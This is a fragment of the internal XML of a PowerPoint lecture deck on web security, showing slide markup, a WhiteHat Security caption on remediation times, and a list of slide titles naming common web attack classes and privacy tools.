            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5954713"/>
            <a:ext cx="300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a:t>(source: WhiteHat Security)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34821" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="5667375"/>
            <a:ext cx="6553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200"/>
              <a:t>More security controls in the framework correlates with longer remediation times</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34822" name="Picture 2" descr="Screen Shot 2015-11-12 at 9.56.41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39115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13325</TotalTime>
  <Words>8346</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>744</Paragraphs>
  <Slides>63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MS PGothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Geneva</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Origin</vt:lpstr>
      <vt:lpstr>Hacking the Web </vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Cyberspace Security Alert Status</vt:lpstr>
      <vt:lpstr>Anonymous</vt:lpstr>
      <vt:lpstr>Anatomy of a typical web attack</vt:lpstr>
      <vt:lpstr>How does “Joe” infect websites with malware?</vt:lpstr>
      <vt:lpstr>Top 15 attacks (2012)</vt:lpstr>
      <vt:lpstr>Attack prevalence by class (2012)</vt:lpstr>
      <vt:lpstr>Median days vulnerability class (2014)</vt:lpstr>
      <vt:lpstr>How  “poor Alice” gets infected?</vt:lpstr>
      <vt:lpstr>Drive-by download .. The automatic infection vector of 2008</vt:lpstr>
      <vt:lpstr>What damage can Joe’s hacks cause?</vt:lpstr>
      <vt:lpstr>Authentication Attacks</vt:lpstr>
      <vt:lpstr>Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Brute Force Example</vt:lpstr>
      <vt:lpstr>Insufficient Authentication</vt:lpstr>
      <vt:lpstr>Insufficient Authentication Example</vt:lpstr>
      <vt:lpstr>Weak Password Recovery Validation</vt:lpstr>
      <vt:lpstr>Weak Password Recovery Example</vt:lpstr>
      <vt:lpstr>Weak Password Recovery Example (cont..)</vt:lpstr>
      <vt:lpstr>Weak Passwords</vt:lpstr>
      <vt:lpstr>PassPhrases</vt:lpstr>
      <vt:lpstr>  Authorization Attacks  </vt:lpstr>
      <vt:lpstr>Credential / Session Prediction (Session Hijacking)</vt:lpstr>
      <vt:lpstr>Credential/Session Prediction Example</vt:lpstr>
      <vt:lpstr>CSRF* Example</vt:lpstr>
      <vt:lpstr>Client Side Attacks</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Example of Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)  Reducing the Threat</vt:lpstr>
      <vt:lpstr>Non-Persistent XSS Attack Example</vt:lpstr>
      <vt:lpstr>Browser and Plugin Vulnerabilities</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking Example</vt:lpstr>
      <vt:lpstr>Example code for Clickjacking  http://beerpla.net/2009/02/12/how-to-fight-clickjacking-using-the-recent-twitter-hijacking-as-an-example</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>A general comment on Injection Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection (cont..)</vt:lpstr>
      <vt:lpstr>JavaScript Hijacking https://capec.mitre.org/data/definitions/111.html</vt:lpstr>
      <vt:lpstr>Javascript Hijacking Example</vt:lpstr>
      <vt:lpstr>Javascript Hijacking Example (cont..)</vt:lpstr>
      <vt:lpstr>Javascript Hijacking (cont.)</vt:lpstr>
      <vt:lpstr>AJAX Security  10 Ajax Security Holes - http://www.net-security.org/article.php?id=956&amp;p=1</vt:lpstr>
      <vt:lpstr>AJAX Security (cont..)</vt:lpstr>
      <vt:lpstr>Search Worms</vt:lpstr>
      <vt:lpstr>Search Worm Examples</vt:lpstr>
      <vt:lpstr>Bypassing the Same-Origin policy </vt:lpstr>
      <vt:lpstr>Bypassing Same-Origin Policy (cont..)</vt:lpstr>
      <vt:lpstr>Recent Attacks</vt:lpstr>
      <vt:lpstr>Worms</vt:lpstr>
      <vt:lpstr>E-mail Hacks</vt:lpstr>
      <vt:lpstr>Account Breaches</vt:lpstr>
      <vt:lpstr>Account Breaches (cont..)</vt:lpstr>
      <vt:lpstr>Account Breaches (cont..)</vt:lpstr>
      <vt:lpstr>Account Breaches (cont..)</vt:lpstr>
      <vt:lpstr>Account Breaches (cont..)</vt:lpstr>
      <vt:lpstr>The NSA</vt:lpstr>
      <vt:lpstr>Distributed Denial-of-Service (DDoS) Attacks</vt:lpstr>
      <vt:lpstr>Top 10 Corporate Hacks</vt:lpstr>
      <vt:lpstr>Privacy Tools</vt:lpstr>
      <vt:lpstr>TOR</vt:lpstr>
      <vt:lpstr>PGP &amp; S/MIME</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Security</dc:title>
  <dc:creator>Arun Viswanathan</dc:creator>
  <cp:lastModifiedBy>XH W</cp:lastModifiedBy>
  <cp:revision>1898</cp:revision>
  <cp:lastPrinted>2016-11-04T15:31:33Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-04-05T23:37:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-08T06:45:15Z</dcterms:modified>
</cp:coreProperties>
</file>